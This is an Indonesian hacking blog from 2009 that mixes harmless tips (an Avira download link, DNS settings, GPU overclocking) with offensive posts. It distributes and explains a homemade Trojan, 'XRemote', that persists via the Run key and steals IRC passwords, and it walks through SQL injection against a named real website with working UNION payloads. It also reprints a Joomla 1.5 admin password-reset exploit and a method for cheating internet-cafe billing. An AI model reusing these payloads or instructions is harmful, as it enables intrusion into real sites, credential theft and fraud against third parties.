Avira Premium Security Suite 8.2.0.247 | 27 Mb
Avira presents the Premium Security Suite with Full protection: Includes basic and advanced antivirus protection, email protection, AntiPhishing, Anti-Spyware and Anti-Adware PLUS: Anti-Spam, Firewall, WebGuard (Safe Surfing), Game Mode and more.! Complete security for workstations! The repeatedly awarded and worldwide used virus and malware protection by over 30 million users now also with WebGuard!
Avira is a German antivirus software company. Its antivirus applications are based on the AntiVir antivirus engine, first launched in 1988. It was called “H+BEDV Datentechnik GmbH” when it was founded. One of the antivirus software, AntiVir Personal, is free for personal usage. Avira is launching a new, comprehensive protection package for end-users as well as small offices and home workers: the Avira Premium Security Suite is a combination of Avira’s brand-new firewall and the proven anti-virus software AntiVir Personal Premium. Even less experienced users can cope with the numerous security threats from the Internet with the central, intuitively operated user interface of the Suite.
Features:
Premium Security Protection:
* AntiVir
* AntiAd/Spyware
* AntiPhishing
* AntiRootkit
* AntiDrive-by
* AntiBot
* EmailScanner
* WebGuard
* RescueSystem
* BackupSystem
* AntiSpam
* FireWall
* GameMode
Premium Security Suite functions and advantages:
• Protection against viruses, worms and Trojans
• Protection against expensive dialers
• Detects and deletes rootkits
• NEW: Raised scan speed
• NEW: Redesigned visual appearance
• Protection against phishing
• Protection against spyware
• Special protection against email viruses (POP 3)
• Fast updates through Premium Server
• 5 Euro donation to Auerbach Foundation
• Protection against annoying adware
• NEW: System to create a Rescue-CD
• WebGuard to surf and download safely
• Firewall included
• AntiSpam and proactive AntiPhishing
• Game Mode
• NEW: Function for Data BackUp
Highlights from the WebGuard:
• Checks Internet downloads against viruses
• Recognizes defective files before they are loaded on your computer
• Affected websites can be blocked, isolated or ignored
• Specific files and URLs can be excluded from the examination
• Works independently from the browser you are using
Operating system: Windows 2000 (SP 4 recommended) / Windows XP and XP 64 Bit (SP 2 recommended) / Windows Vista 32 Bit and 64 Bit
Download : http://rapidshare.com/files/171464267/Avira_Security_8.2.0.247.rar (klik disini)
Monday, March 30, 2009
Avira Premium Security Suite 8.2.0.247
cara mempercepat dan menyetabilkan koneksi internet
di jaman sekarang, tarif internet semakain murah….. seperti yang diberikan oleh telkomsel dan indosat…… 2 operator itu menyediakan paket internet unlimited. namun ada beberapa kelemahan yang dimiliki oleh koneksi internet melalui broadband / koneksi internet nirkabel
saya memiliki beberapa cara untuk membuat koneksi internet semakin lancar, tanpa down atau putus2..
demikian caranya
1. instal program treewalk (Dapat di download di sini http://www.ziddu.com/download/4080568/051111twdns.zip.html)
2. setelah di instal ganti setting DNS dengan 127.0.0.1
cara setting DNS :
1. pilih start-control panel-network and internet connectins-netwok connection
2. klik kanan koneksi yang biasa anda gunakan / yang digunakan sekarang
3. pilih tab networking
4. klik internet protocol (TCP/IP) lalu pilih properti
5. centang atau tandai use the following DNS server addresses
6. masukan 127.0.0.1 pada prefered DNS server
selain itu, kita juga dapat menggunakan beberapa DNS yang dapat di coba dan dapa mempercepat dan membuat stabil koneksi internet
kalo menggunakan DNS di bawah ini tidak perlu menginstal treewalk
OpenDNS
* 208.67.222.222
* 208.67.220.220
telkom.net.id Daftar DNS TelkomNet
* 202.155.0.20
* 202.155.0.15
* 202.134.0.62
* 202.134.0.155
* 202.134.1.10
* 202.134.2.5
* 203.130.196.5
cbn.net.id
* 202.158.40.1
* 202.158.20.1
indo.net.id
* 202.159.32.2
* 202.159.33.2
indosat.net.id
* 202.155.0.20
* 202.155.0.15
* 202.155.30.227
itb.ac.id
* 202.249.24.65
* 167.205.23.1
* 167.205.22.123
* 167.205.30.114
ukdw.ac.id
* 222.124.22.18
sat.net.id
* 202.149.82.25
* 202.149.82.29
setting ini sangat cocok untuk telkomsel flash unlimited karena koneksinya sering down.
temenq uda buktiin, dan hasilnya sangat memuaskan. koneksi internet telkomselflash temenq sekarang jarang sekali down bahkan tidak pernah
XRemote (Trojan Dan Remoter PC Berbasis Windows)
Penulis : poni irc.dal.net #Yogyafree , #Khuntong , #H.A.C.K
NB : Saya tidak bertanggung jawab atas kerusakan sistem yang mungkin terjadi akibat
menjalankan tool ini. Gunakan secara bijak dan sebagai ilmu pegetahuan saja.
Pengantar
Pertama, Saya ingin menyampaikan salam perkenalan kepada seluruh rekan staff Yogyafree dan juga
untuk semua pembaca X-CODE magazine. Tujuan dari penulisan artikel ini adalah sebagai kontribusi
untuk menggembangkan komunitas Yogyafree. Artikel ini dipersembahkan dengan segala
kerendahan hati tanpa ada maksud untuk menggurui. Penulis artikel ini bukan dan belum pantas
disebut sebagai Hacker. Penulis hanya seorang pemerhati komputer,internet, hacking dan security. Jika
ada kesalahan baik dalam penulisan maupun kata-kata yang mungkin menyinggung mohon
dimaafkan.
Topik Artikel
Baiklah, saya langsung saja ke topik. Seperti yang telah kita ketahui. Trojan adalah salah satu contoh
kreativitas seorang hacker untuk mengendalikan komputer korbannya dalam jaringan (Definisi Trojan
tidak akan dijelaskan disini, bagi rekan yang ingin mengetahui lebih jelas tentang Trojan dapat disearch
melalui google dengan keyword “define:Trojan”). Trojan sudah lama eksis di dunia internet
dan Trojan yang terkenal adalah Netbus, BackOriffice. Trojan terdiri dari dua bagian, yaitu
“client/remoter“ (program pengontrol yang di-install ke komputer kita) dan “server/slave” (program
yang di-install ke komputer korban supaya dapat dikendalikan dari komputer kita).
Pada artikel ini saya ingin membagikan Trojan buatan sendiri. XRemote. Dapat di download di
http://www.ziddu.com/download/4080315/Xremote.zip.html atau disini (Mas kurniawan, masukkin aja link
langsung dari yogyafree.net). Harap baca terlebih dahulu README.txt di dalam file zip sebelum
anda meng-install ke dalam komputer pribadi. Trojan yang dibuat dengan Visual Basic ini
berdasarkan referensi dari penulis Trojan Vortex dan beberapa penulis Trojan Underground lainnya.
Trojan ini juga disertakan beberapa tool tambahan seperti port scanner dan ICMP flooder. Trojan
XRemote masih dalam tahap uji coba dan mungkin masih banyak Bugs yang tidak disadari oleh
penulis.
Instalasi & Penggunaan
Setelah file selesai anda download, ekstrak ke C:\temp atau tempat lain sesuka anda. Anda akan
menemukan 2 folder yaitu : XremoteClient dan XremoteServer di C:\temp.
1. Instalasi dan proses server trojan (“services.exe”)
Hal pertama yang perlu diperhatikan. Jika anda ingin mencoba meng-install “services.exe” di
komputer pribadi anda, saya rasa ada baiknya anda membuat restore point untuk mengatisipasi
kemungkinan terburuk yang akan terjadi. Tetapi bagi rekan-rekan yang sudah pada tahap Geek, Trojan
“services.exe” Xremote ini tidak akan menjadi permasalahan serius.
Adalah sebuah usaha yang perlu anda lakukan untuk meng-install “server” ke komputer lawan (saya
yakin anda lebih kreatif dan lebih jahat dari saya.. hahahaha). Setelah komputer korban terinfkesi,
maka proses yang akan dilakukan oleh server Trojan adalah:
• Trojan meng-copy dirinya ke C:\WINDOWS\system\services.exe
• Trojan membuat nilai registry di
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sehingga Trojan akan aktif
setiap kali windows startup.
• Trojan membuka koneksi TCP/IP melalui port 1001 dan port 999.
• Jika di komputer korban ter-install mIRC di C:\program files\mIRC\ maka Trojan akan
mengubah file aliases.ini , script.ini, perform.ini (file pendukung mIRC). Akibatnya ketika
korban menjalankan mIRC setelah terinfeksi Xremote, maka korban akan secara otomatis join
ke #H.A.C.K (/windows –h #H.A.C.K) tanpa disadari. Korban dapat dikendalikan dengan
commands tertentu untuk melakukan flooding, cloning, join/part dari channel, Op/deOP dll.
Korban juga akan mengirimkan password nicknya ke #H.A.C.K setiap kali dia melakukan
/identify nick password.
• Trojan tidak ditampilkan di monitor korban (namanya juga Trojan) tetapi dapat dilihat melalui
Task Manager.
Anda dapat mematikan Trojan ini dengan sangat mudah. Hapus nilai registry-nya, restart komputer
dan delete filenya di C:\WINDOWS\system\services.exe. Kemampuan jahat server Trojan terpaksa
dibatasi mengingat keterbatan waktu. Mungkin saya akan menambahkan lagi beberapa opsi yang bisa
dilakukan Xremote untuk versi Update.
2. Instalasi dan penggunaan Client trojan (“Xremote.exe”)
“Xremote.exe”. Ini adalah “Client/Controller” yang perlu di-install ke komputer anda. “Xremote.exe”
tidak akan merusak sistem. Tidak ada perubahan nilai registry, menginjeksi maupun merubah
program lain di komputer anda seperti yang dilakukan “services.exe”.
Setelah selesai melakukan tahap penginstallan “client” di komputer. Anda dapat melihat tampilan
awal “Client” berikut di bawah ini :
Proses melakukan koneksi dan mengirim file ke komputer korban :
• Isi nama komputer atau alamat IP korban yang telah ditanamkan “services.exe” di kolom “IP
Address”, Isi port 1001 sebagai pintu masuk. Klik tombol “connect”. Jika berhasil maka anda
akan melihat tulisan “Status Connected” di kolom status.
• “Status : connected”. Ok saatnya menyusupkan sesuatu ke komputer korban (file seperti :
file.exe, file.jpg. dll). Pilih drive di komputer anda (kolom “Your Drive” partisi C:\ , D:\ ,Flashdisk, dll) lalu lokasi file yang hendak dikirim (kolom “Your Directory” dan kolom “Your
File”). Setelah itu tentukan lokasi dimana anda akan meletakkan file tersebut di komputer
korban (kolom “Target`s Directory\Folder to send”).
• Jika terkirim, anda akan melihat data jumlah byte dan file yang berhasil disusupkan ke
komputer korban.
• Jika kita ingin mengakhiri koneksi atau masuk ke komputer lain yang juga terinfeksi
“services.exe” klik tombol “stop” lalu ganti alamat IP-nya. Seandainya kita ingin konek
kembali ke komputer korban pertama yang telah disconnect sebelumnya, kita perlu melakukan
rebuild terhadap ‘services.exe”. Karena ketika kita disconnect dari komputer korban, trojan
juga akan menutup akses lalu lintas data dengan kita (“Client”). Masukkan lagi IP address dan
port 1001. lalu klik “rebuild”. Maka trojan akan melakukan self reload. Kok harus reload??
Tanya kenapa??hahahaha..
3. Tools tambahan Xremote:
Ghost Remote :
Jika kolom IP address kosong, isilah terlebih dahulu lalu klik “connect”, maka port 999 pada komputer
korban akan terbuka. Adapun yang dapat dilakukan oleh tool ini adalah:
• Open CDROM = membuka CD/DVD-ROM
• Close CDROM = menutup CD/DVD-ROM
• Freeze mouse = mengunci kursor mouse
• Free mouse = membuka kunci kursor mouse
• Hide TaskBar = menyembunyikan taskbar
• Show Taskbar = menampilkan taskbar
• Shut down = masa ga tau sih????
• DARK LORD = menghitamkan latar
• Ghost Shell = menjalankan program, membuka situs dll di komputer program (path harus diisi
dengan lengkap dan benar, misalnya C:\program files\mirc\mirc.exe).
Port Scanner :
Tool ini berfungsi untuk mengecek port-port apa saja yang aktif pada sebuah komputer.
Penggunaannya saya rasa rekan-rekan sudah tahu.
ICMP Flooder :
Tool ini berfungsi untuk melakukan ping flood secara brutal ke komputer target.
Cara Sederhana Proteksi File *.Exe Dari Virus [ Tanpa Anti Virus ]
Pemakaian anti virus belum tentu jaminan klo kompi bakal bebas virus, trojan,
worm.. Ataupun klo make firewall atau anti virus RTS [ real time system ] juga
ga bakal jamin bebas virus. Apalagi firewall dan anti virus RTS bakal bikin
kompi lebih lambat. Cara ini gue pake buat ngelindungin file dengan extensi exe
atau aplikasi.
Pertama pake search [ lewat start menu ] trus pilih 'all files and folders'. Ketik di
bagian 'All or part of the file name' : *.exe --->mencari file berextensi .exe Pada
bagian Look ini, pilih my computer aja. Search aja langsung.Kalo udah blok
semua file [ pke Ctrl + a ], trus klik kanan, pilih properties.
Pada attribut pilih 'read only'. Dengan memakai attrib read only, file file tersebut
hanya bisa di liat/di buka aja. So virus ga bisa merusak atau merubah file file
tersebut. kalo perlu tambahin aja attribut hidden.
Atau pake cara yang lebih gampang lewat command promt. Caranya buka
command promt, masuk ke drive C. Misal saat membuka command promt,
tampilan yang keluar biasanya
C:\Documents and Settings\user
nah buat kembali ke drive C, ktik aja : 'c..' [ tanpa tanda petik ]
sampai masuk ke C:\
Trus ketik: attrib +r *.exe
Untuk menambah attrib hidden, tambahin aja : +h
Gitu aja yah..Moga membantu.
Mengatur Sistem Komputer Tanpa Melalui Registry
Cara ini dipake buat ngegantiin fungsi registry. Misalnya aja registrynya di
disable atau andaikan bisa di buka registrynya, ga memperbolehkan untuk
mengedit stringnya kecuali administrator. Nah kita ga bisa apa apa kan...Lha
trus gimana?
Cara ini pernah gue pake waktu kompi di skul gue [ dalam jaringan LAN ] di
disable registrynya. Trus pas udah bisa kebuka, ga bisa di edit stringnya :p~
Woi, pke cerita segala loe!! :p Caranya yang pertama, buka explorer. Masuk ke
c:\windows\system32 Cari file yang namanya 'gpedit'. Klik aja 2 kali.
Di sebelah kiri ada tulisan Local Computer Policy, trus di situ ada pilihan
'Computer Configuration' dan 'User Configuration'. Nah dari situ kita bisa utak
atik aj.. :p
Misal [ yang pernah gue utak atik ]: Kita masuk Computer Configuration,
Administrative templates, Windows Components, Security Center, Turn on
Security Center. Trus klik 2 kali, pilih disable buat matiinnya.
Contoh laen:
Computer Configuration\Administrative templates\System\Group
Policy\Registry policy processing
User Configuration\Administrative templates\Windows Components\Terminal
Service\Client\Do not allow passwords to be saved
User Configuration\Administrative templates\Start Menu and
Taskbar\remove Logoff on the Start menu
User Configuration\Administrative templates\Desktop\Hide and disable
all items on the desktop
User Configuration\Administrative templates\Desktop, Active
Desktop\Disable all items
User Configuration\Administrative templates\Control Panel\Add or Remove
Programs\Remove Add or Remove Programs
User Configuration\Administrative templates\System\Crtl+Alt+Del
Options\Remove Task Manager
User Configuration\Administrative templates\System\Crtl+Alt+Del
Options\Remove Logoff
Segitu aja yah contoh contohnya. Yang lainnya bisa kembangin sendiri. Dengan
cara itu kita bisa ancurin tuh kompi. Hehehehe
Tapi itu semua cuma buat pembelajaran aja yah.. :)
By: bernad_satriani / bl4ck_94m81t
Mencurangi (hampir) Semua Jenis Billing Warnet
Artikel ini dibuat oleh seorang newbie dan lamer bernama Blizbs_Uchiha dan
ditujukan oleh newbie2 laennya. Buat mas-mas dan om-om yang merasa udah
merasa pinter ato udah tau caranya sangat disarankan untuk tidak usah
membaca artikel ini karena hanya membuang2 waktu anda yang sangat
berharga.
Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi :)
Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat
ngakalin billing warnetnya buat ngirit ongkos online.
Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing
Explorer(memang bisa, saya sudah membuktikannya)
Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi
billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis
windows!!!
Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah
baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?:)
Ini dia caranya ...
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat
windows dimulai adalah login screen client billing yang menutupi seluruh area
windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable
untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap
dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah...
udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya.
Daripada mati kebosanan :)
Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela
login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah
satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang
menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan
adalah progie yang anda gunakan harus bisa show/hide window pake hotkey
coz windows kita kan ditutupi sama login screen sialan itu.
Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe
setengah isi disket. Aku nemu progie kalo ga salah di bonus CD Chip. Dah lupa
edisi yg keberapa.
2. Muka bego
3. Mental yang kuat
Langkah-langkahnya:
01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong.
Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu
kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada,
cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan
Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan
aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing
server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login
screen yang menghilang entah kemana:)
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif
sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.
Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu.
Apalagi bila si op sering keluyuran.
Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan
baca file readme yang disertakan bersama zhider
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan,
dan juga menutup zhider.
Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya
perbuatan jahatmu tidak diridhai Tuhan :)
Kalo ketahuan langsung pertebal "muka bego"-mu. Misalnya bilang "Eh, kok jadi
gini ya? Kemaren ga gini kok." Ato kata-kata lain, tergantung kreatifitas anda.
Penulis tidak bertanggung jawab atas kerugian yang ditimbulkan atas
penggunaan artikel ini (Use at Your Own Risk).
Saturday, March 28, 2009
SQL INJECTION V.5
Hacking Website dengan menggunakan SQL injection V.5
TARGET
http://www.cleanchemicalfree.ca
http://www.cleanchemicalfree.ca/product.php?id=-89
Dimana ?id=6778 (angka terserah kita karena setiap web berbeda)dan di mana ?id=
Berfungsi untuk memancing error di suatu web target kita
PANCING DENGAN
?id=-89 KLU WEB MASIH NORMAL TAMBAHIN DENGAN --
UNION+ALL+SELECT
-------- dan apa yg terjadi ----
Kluar error
Could not run query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/flyingwr/public_html/cleanchemicalfree.ca/product_main.php on line 21
TAMBAHIN SEPERTI YANG SAYA TULIS DI BAWAH INI UNTUK MENCARI COLUMN YG BERMASALAH
http://www.cleanchemicalfree.ca/product.php?id=-89+union+all+select+1,2,3,4,5,6
Tambahkan : ?id=-89+union+all+select+1,2,3,4,5,6 dan seterusnya guna mencari dan menemukan column yang kluar di web seperti di bawah ini
KLUAR DEH ERROR NYA " 2 "
Sekarang kita coba cek versi dari sql nya dengan menambahkan VERSION() di nomer column nya seperti contoh di bawah ini
http://www.cleanchemicalfree.ca/product.php?id=-89+union+all+select+1,version(),3,4,5,6
Kluar deh Versi dari SQL nya
5.0.67-community-log
DI MANA UNTUK VERSI 5 BERBEDA DGN VERSI EMPAT
group_concat(table_name)
from+information_schema.tables+where+table_schema=database()--
LAKUKAN INJECTION SEPERTI DI BAWAH INI
http://www.cleanchemicalfree.ca/product.php?id=-89+union+all+select+1,group_concat(table_name)%20,3,4,5,6+from+information_schema.tables+where+table_schema=database()--
Dimana group_concat(table_name) mempunyai fungsi untuk melakukan injection pada column SQL,dan menambahkan from+information_scheme.column+where+table_scheme=database()—
Di mana keterangan yang berwarna biru berfungsi untuk menampilkan database dalam web target
Dan apa yang kluar
Nama tablenya
ads,ads_backup,cleanchemicalfreenew,cleanchemicalfreeproducts,cleanchemicalfreespecials,main_page_sponsors,newAds$4
SEKARANG KITA COBA UNTUK MENCARI DI MANA LETAK USER SM PASSWORD NYA DENGAN CARA SEPERTI DI BAWAH INI
KITA PILIH cleanchemicalfreespecials DAN COBA KITA ENCRYPT DARI TEXT TO HEX
Downloud tool di bawah ini buat encrypt dari Text To Hex
http://www.freewebs.com/suk3t1r3ng/MySQL_Dump_v1.rar
Sekarang kita coba masuk lebih dalam lagi ke dalam web target
http://www.cleanchemicalfree.ca/product.php?id=-89+union+all+select+1,group_concat(table_name) %20,3,4,5,6+from+information_schema.tables+where+table_schema=database()—
group_concat----column excekusi ------ +info nama klom yg sudah di hash
ganti dengan group_concat(table_name)
group_concat(column_name)
Sedang from+information_schema.tables+where+table_schema=database()—
from+information_schema.columns+where+table_name= 0x636c65616e6368656d6963616c667265657370656369616c73
Dimana 0x636c65616e6368656d6963616c667265657370656369616c73 adalah cleanchemicalfreespecials yang sudah kita encrypt dari Text ke Hex dari tools yg sudah downloud dari web di atas
http://www.cleanchemicalfree.ca/product.php?id=-89+union+all+select+1, group_concat(column_name) %20,3,4,5,6+from+information_schema.columns+where+table_name= 0x636c65616e6368656d6963616c667265657370656369616c73
Kluar table di database nya
ID,Title,Desc,Price,Image,Paypal
http://www.cleanchemicalfree.ca/product.php?id=-89+union+all+select+1,%20group_concat(column_name)%20%20,3,4,5,6+from+information_schema.columns+where+table_name=%200x636c65616e6368656d6963616c667265657370656369616c73
Ganti (column_name) dengan ID,Title,Desc,Price,Image,Paypal
Dan ganti =%200x636c65616e6368656d6963616c667265657370656369616c73
from+information_schema.columns+where+table_name=%200x636c65616e6368656d6963616c667265657370656369616c73
http://www.cleanchemicalfree.ca/product.php?id=-89+union+all+select+1, group_concat(ID,Title,Desc,Price,Image,Paypal) from+information_schema.columns+where+table_name=cleanchemicalfreespecials
Selanjut nya selamat mencoba !!!
Yang Tunjukan hanya sebagai membelajaran saja,t3cm4n tidak bertangung jawab atas apa yg telah anda lakukan.
Nb: Jangan lupa pakai Proxy yaa klu mau mainin web orang :D
Good Luck !
Friday, March 27, 2009
Hacking Joomla
Tutorial mudah untuk hacking joomla,,
selamat mencoba,,,
#####################################################################################
#### Joomla 1.5.x Remote Admin Password Change ####
#####################################################################################
# #
# Author: d3m0n (d3m0n@o2.pl) #
# Greets: GregStar, gorion, d3d!k #
# #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff #
# #
#####################################################################################
File : /components/com_user/controller.php
#####################################################################################
Line : 379-399
function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );
// Get the input
$token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1}
// Get the model
$model = &$this->getModel('Reset');
// Verify the token
if ($model->confirmReset($token) === false) < --- {2}
{
$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
return false;
}
$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
}
#####################################################################################
File : /components/com_user/models/reset.php
Line: 111-130
function confirmReset($token)
{
global $mainframe;
$db = &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3}
// Verify the token
if (!($id = $db->loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}
// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token', $token);
$mainframe->setUserState($this->_namespace.'id', $id);
return true;
}
#####################################################################################
{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "
Example :
1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm
2. Write into field "token" char ' and Click OK.
3. Write new password for admin
4. Go to url : target.com/administrator/
5. Login admin with new password
# milw0rm.com [2008-08-12]
OverClock VGA Card NVIDIA dengan RivaTuner
Para gimer kebanyakan menggunakan Windows XP sebagai platform
Operating System buat ngegame tapi gimana kalau VGA Card yang kita punyai
loyo ? Duitpun sedang cekak untuk membeli VGA Card baru yang lebih
bertenaga lalu apa solusinya ? OverClock VGA Card !
Banyak para gimer kesulitan mendapatkan informasi bagaimana
melakukan overclock pada VGA Cardnya, tenang, penulis akan
membeberkannya untuk anda! Bahwa begitu mudahnya melakukan overclock
VGA Card NVIDIA dengan RivaTuner dan bersiaplah ngegame makin mantab
dan puas walaupun kadang tidak selalu begitu ☺.
Penulis disini akan melakukan overclock pada VGA Card yang cukup tua
yaitu NVIDIA GeForce2 MX 100/200 32 Mb, biar cukup tua tapi untuk maenin
games 3D yang tidak terlalu berat seperti ItalianJob, WillRock dan lainnya
berjalan sangat mulus alias lewat hehe, apalagi setelah Crazy Taxi resolusi
1024x768 tetap lewatlah ☺
Pertama sediakan dulu 2 program sebelum memulai yaitu PC Wizard
2006 untuk memeriksa GPU Frequency dan Memory Frequency GPU pada VGA
Card anda. Untuk OverClock tentu saja anda dapat menggunakan RivaTuner,
sebenarnya banyak tools untuk overclock VGA tapi penulis memilih RivaTuner
karena tool ini punya fitur yang lengkap.
Oh iya sebelum menggunakan RivaTuner jika ada tool overclock VGA
yang jalan di PC maka hapus dulu tool overclock VGA Card lainnya yang anda
punya karena bisa terjadi konflik antar tool dan itu pernah penulis alami
sehingga ahkirnya dapat membuat detonator NVIDIA hilang, tapi jangan terlalu
di kuatirkan tentang itu justru dengan hilangnya detonator NVIDIA maka game
CRC 2005 bisa jalan ☺.
Sekarang perhatikan gambar dibawah ini :
GeForce2 MX 100/200 32 Mb mempunyai GPU Frequency : 175 MHz dan
Memory Frequency GPU : 334.09 MHz yang dimana inilah yang akan kita
tingkatkan nanti menjadi lebuh tinggi kecepatannya.
Ini adalah tampilan pada program RuvaTuner untuk fitur mengubah Core Clock
dan Memory Clock, pertama-tama centang dulu pada “Enable Low-Level
hardware-overclocking.
Klik Detect pada pilihan menu dan tampillah tampilan seperti dibawah ini :
Uhui, overclock VGA siap dilakukan coy, tinggal kita tarik saja Core Clock dan
Memory Clock sampai batas garis biru sebelah kanan, setelah itu kita klik pilihan
Test.
Setelah klik test maka ada proses dan setelah Test berhasil dilakukan maka
centang pada Apply overclocking at Windows Startup lalu pilih Apply atau Ok.
Sekarang kita kembali dengan program PC Wizard 2006 lalu Wow! Saat ini GPU
Frequency : 219.98 MHz dan Memory Frequency GPU : 422.38 MHz, kalau mau
lebih detil dalam pengujian bisa pakai Bencmark yang ada di PC Wizard 2006,
dibawah ini tabel hasil pengujian.
Sebelum di overclock Sesudah di overclock
GPU Frequency : 175 MHz GPU Frequency : 219.98 MHz
Memory Frequency GPU : 334.09 MHz Memory Frequency GPU : 422.38 MHz
Selamat mengoverclock, hati-hati dalam melakukan overclock, segala kerusakan
komputer baik software maupun hardware karena artikel ini bukanlah tanggung
jawab penulis.
